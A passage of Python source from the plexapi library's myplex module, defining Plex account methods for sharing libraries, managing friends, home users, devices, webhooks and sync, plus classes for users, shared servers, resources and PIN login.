values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be added.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objecs, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
# If user does not already exists, treat request as new request and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (:class:`~plexapi.myplex.MyPlexUser`): `MyPlexUser` object, username, or email
of the user to be updated.
server (:class:`~plexapi.server.PlexServer`): `PlexServer` object, or machineIdentifier
containing the library sections to share.
sections (List<:class:`~plexapi.library.LibrarySection`>): List of `LibrarySection` objecs, or names
to be shared (default None). `sections` must be defined in order to update shared libraries.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: `{'contentRating':['G'], 'label':['foo']}`
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: `{'label':['foo']}`
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
log.warning('Section name, number of section object is required changing library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
if isinstance(filterMovies, dict):
params['filterMovies'] = self._filterDictToStr(filterMovies or {}) # '1' if allowChannels else '0'
if isinstance(filterTelevision, dict):
params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
if isinstance(allowChannels, dict):
params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += utils.joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
username = str(username)
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
_id = utils.cast(int, elem.attrib.get('id'))
_key = utils.cast(int, elem.attrib.get('key'))
_title = elem.attrib.get('title', '').lower()
allSectionIds[_id] = _id
allSectionIds[_key] = _id
allSectionIds[_title] = _id
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section.lower()
sectionIds.append(allSectionIds[sectionKey])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
raise BadRequest('Unknown filter key: %s', key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`~plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`~plexapi.video.Video.sync`, :func:`~plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`~plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
Returns:
:class:`~plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
:exc:`~plexapi.exceptions.BadRequest`: When client with provided clientId wasn`t found.
:exc:`~plexapi.exceptions.BadRequest`: Provided client doesn`t provides `sync-target`.
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
raise BadRequest('Unable to find client by clientId=%s', clientId)
if 'sync-target' not in client.provides:
raise BadRequest('Received client doesn`t provides sync-target')
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def onlineMediaSources(self):
""" Returns a list of user account Online Media Sources settings :class:`~plexapi.myplex.AccountOptOut`
"""
url = self.OPTOUTS % {'userUUID': self.uuid}
elem = self.query(url)
return self.findItems(elem, cls=AccountOptOut, etag='optOut')
def link(self, pin):
""" Link a device to the account using a pin code.
Parameters:
pin (str): The 4 digit link pin code.
"""
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Plex-Product': 'Plex SSO'
}
data = {'code': pin}
self.query(self.LINK, self._session.put, headers=headers, data=data)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~plexapi.myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address (user@gmail.com).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
protected (False): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
title (str): Seems to be an aliad for username.
username (str): User's username.
servers: Servers shared between user and friend
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers
Attributes:
TAG (str): section
id (int): The shared section ID
key (int): The shared library section key
shared (bool): If this section is shared with the user
title (str): Title of the section
type (str): movie, tvshow, artist
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.key = utils.cast(int, data.attrib.get('key'))
self.shared = utils.cast(bool, data.attrib.get('shared', '0'))
self.title = data.attrib.get('title')
self.type = data.attrib.get('type')
self.sectionId = self.id # For backwards compatibility
self.sectionKey = self.key # For backwards compatibility
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (str): what id plex uses for this.
machineIdentifier (str): The servers machineIdentifier
name (str): The servers name
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries
allLibraries (bool): True if all libraries is shared with this user.
owned (bool): 1 if the server is owned by the user
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
return self.findItems(data, Section, rtag='SharedServer')
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resources accesstoken.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~plexapi.myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
key = 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.accessToken = logfilter.add_secret(data.attrib.get('accessToken'))
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.provides = data.attrib.get('provides')
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.synced = utils.cast(bool, data.attrib.get('synced'))
self.presence = utils.cast(bool, data.attrib.get('presence'))
self.connections = self.findItems(data, ResourceConnection)
self.publicAddressMatches = utils.cast(bool, data.attrib.get('publicAddressMatches'))
# This seems to only be available if its not your device (say are shared server)
self.httpsRequired = utils.cast(bool, data.attrib.get('httpsRequired'))
self.ownerid = utils.cast(int, data.attrib.get('ownerId', 0))
self.sourceTitle = data.attrib.get('sourceTitle') # owners plex username.
def connect(self, ssl=None, timeout=None):
""" Returns a new :class:`~plexapi.server.PlexServer` or :class:`~plexapi.client.PlexClient` object.
Often times there is more than one address specified for a server or client.
This function will prioritize local connections before remote or relay and HTTPS before HTTP.
After trying to connect to all available addresses for this resource and
assuming at least one connection was successful, the PlexServer object is built and returned.
Parameters:
ssl (bool, optional): Set True to only connect to HTTPS connections. Set False to
only connect to HTTP connections. Set None (default) to connect to any
HTTP or HTTPS connection.
timeout (int, optional): The timeout in seconds to attempt each connection.
Raises:
:exc:`~plexapi.exceptions.NotFound`: When unable to connect to any addresses for this resource.
"""
# Keys in the order we want the connections to be sorted
locations = ['local', 'remote', 'relay']
schemes = ['https', 'http']
connections_dict = {location: {scheme: [] for scheme in schemes} for location in locations}
for connection in self.connections:
# Only check non-local connections unless we own the resource
if self.owned or (not self.owned and not connection.local):
location = 'relay' if connection.relay else ('local' if connection.local else 'remote')
connections_dict[location]['http'].append(connection.httpuri)
connections_dict[location]['https'].append(connection.uri)
if ssl is True: schemes.remove('http')
elif ssl is False: schemes.remove('https')
connections = []
for location in locations:
for scheme in schemes:
connections.extend(connections_dict[location][scheme])
# Try connecting to all known resource connections in parellel, but
# only return the first server (in order) that provides a response.
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.accessToken, timeout] for url in connections]
log.debug('Testing %s resource connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Resource', self.name, results)
class ResourceConnection(PlexObject):
""" Represents a Resource Connection object found within the
:class:`~plexapi.myplex.MyPlexResource` objects.
Attributes:
TAG (str): 'Connection'
address (str): Local IP address
httpuri (str): Full local address
local (bool): True if local
port (int): 32400
protocol (str): HTTP or HTTPS
uri (str): External address
"""
TAG = 'Connection'
def _loadData(self, data):
self._data = data
self.protocol = data.attrib.get('protocol')
self.address = data.attrib.get('address')
self.port = utils.cast(int, data.attrib.get('port'))
self.uri = data.attrib.get('uri')
self.local = utils.cast(bool, data.attrib.get('local'))
self.httpuri = 'http://%s:%s' % (self.address, self.port)
self.relay = utils.cast(bool, data.attrib.get('relay'))
class MyPlexDevice(PlexObject):
""" This object represents resources connected to your Plex server that provide
playback ability from your Plex Server, iPhone or Android clients, Plex Web,
this API, etc. The raw xml for the data presented here can be found at:
https://plex.tv/devices.xml
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/devices.xml'
clientIdentifier (str): Unique ID for this resource.
connections (list): List of connection URIs for the device.
device (str): Best guess on the type of device this is (Linux, iPad, AFTB, etc).
id (str): MyPlex ID of the device.
model (str): Model of the device (bueller, Linux, x86_64, etc.)
name (str): Hostname of the device.
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (string): Version of the product.
provides (str): List of services this resource provides (client, controller,
sync-target, player, pubsub-player).
publicAddress (str): Public IP address.
screenDensity (str): Unknown
screenResolution (str): Screen resolution (750x1334, 1242x2208, etc.)
token (str): Plex authentication token for the device.
vendor (str): Device vendor (ubuntu, etc).
version (str): Unknown (1, 2, 1.3.3.3148-b38628e, 1.3.15, etc.)
"""
TAG = 'Device'
key = 'https://plex.tv/devices.xml'
def _loadData(self, data):
self._data = data
self.name = data.attrib.get('name')
self.publicAddress = data.attrib.get('publicAddress')
self.product = data.attrib.get('product')
self.productVersion = data.attrib.get('productVersion')
self.platform = data.attrib.get('platform')
self.platformVersion = data.attrib.get('platformVersion')
self.device = data.attrib.get('device')
self.model = data.attrib.get('model')
self.vendor = data.attrib.get('vendor')
self.provides = data.attrib.get('provides')
self.clientIdentifier = data.attrib.get('clientIdentifier')
self.version = data.attrib.get('version')
self.id = data.attrib.get('id')
self.token = logfilter.add_secret(data.attrib.get('token'))
self.screenResolution = data.attrib.get('screenResolution')
self.screenDensity = data.attrib.get('screenDensity')
self.createdAt = utils.toDatetime(data.attrib.get('createdAt'))
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.connections = self.listAttrs(data, 'uri', etag='Connection')
def connect(self, timeout=None):
""" Returns a new :class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
Sometimes there is more than one address specified for a server or client.
After trying to connect to all available addresses for this client and assuming
at least one connection was successful, the PlexClient object is built and returned.
Raises:
:exc:`~plexapi.exceptions.NotFound`: When unable to connect to any addresses for this device.
"""
cls = PlexServer if 'server' in self.provides else PlexClient
listargs = [[cls, url, self.token, timeout] for url in self.connections]
log.debug('Testing %s device connections..', len(listargs))
results = utils.threaded(_connect, listargs)
return _chooseConnection('Device', self.name, results)
def delete(self):
""" Remove this device from your account. """
key = 'https://plex.tv/devices/%s.xml' % self.id
self._server.query(key, self._server._session.delete)
def syncItems(self):
""" Returns an instance of :class:`~plexapi.sync.SyncList` for current device.
Raises:
:exc:`~plexapi.exceptions.BadRequest`: when the device doesn`t provides `sync-target`.
"""
if 'sync-target' not in self.provides:
raise BadRequest('Requested syncList for device which do not provides sync-target')
return self._server.syncItems(client=self)
class MyPlexPinLogin(object):
"""
MyPlex PIN login class which supports getting the four character PIN which the user must
enter on https://plex.tv/link to authenticate the client and provide an access token to
create a :class:`~plexapi.myplex.MyPlexAccount` instance.
This helper class supports a polling, threaded and callback approach.
- The polling approach expects the developer to periodically check if the PIN login was
successful using :func:`~plexapi.myplex.MyPlexPinLogin.checkLogin`.
- The threaded approach expects the developer to call
:func:`~plexapi.myplex.MyPlexPinLogin.run` and then at a later time call
:func:`~plexapi.myplex.MyPlexPinLogin.waitForLogin` to wait for and check the result.
- The callback approach is an extension of the threaded approach and expects the developer
to pass the `callback` parameter to the call to :func:`~plexapi.myplex.MyPlexPinLogin.run`.
The callback will be called when the thread waiting for the PIN login to succeed either
finishes or expires. The parameter passed to the callback is the received authentication
token or `None` if the login expired.
Parameters:
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
requestTimeout (int): timeout in seconds on initial connect to plex.tv (default config.TIMEOUT).
Attributes:
PINS (str): 'https://plex.tv/api/v2/pins'
CHECKPINS (str): 'https://plex.tv/api/v2/pins/{pinid}'
LINK (str): 'https://plex.tv/api/v2/pins/link'
POLLINTERVAL (int): 1
finished (bool): Whether the pin login has finished or not.
expired (bool): Whether the pin login has expired or not.
token (str): Token retrieved through the pin login.
pin (str): Pin to use for the login on https://plex.tv/link.
"""
PINS = 'https://plex.tv/api/v2/pins' # get
CHECKPINS = 'https://plex.tv/api/v2/pins/{pinid}' # get
POLLINTERVAL = 1
def __init__(self, session=None, requestTimeout=None, headers=None):
super(MyPlexPinLogin, self).__init__()
self._session = session or requests.Session()
self._requestTimeout = requestTimeout or TIMEOUT
self.headers = headers
self._loginTimeout = None
self._callback = None
self._thread = None
self._abort = False
self._id = None
self._code = None
self._getCode()
self.finished = False
self.expired = False
self.token = None
@property
def pin(self):
return self._code
def run(self, callback=None, timeout=None):
""" Starts the thread which monitors the PIN login state.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Raises:
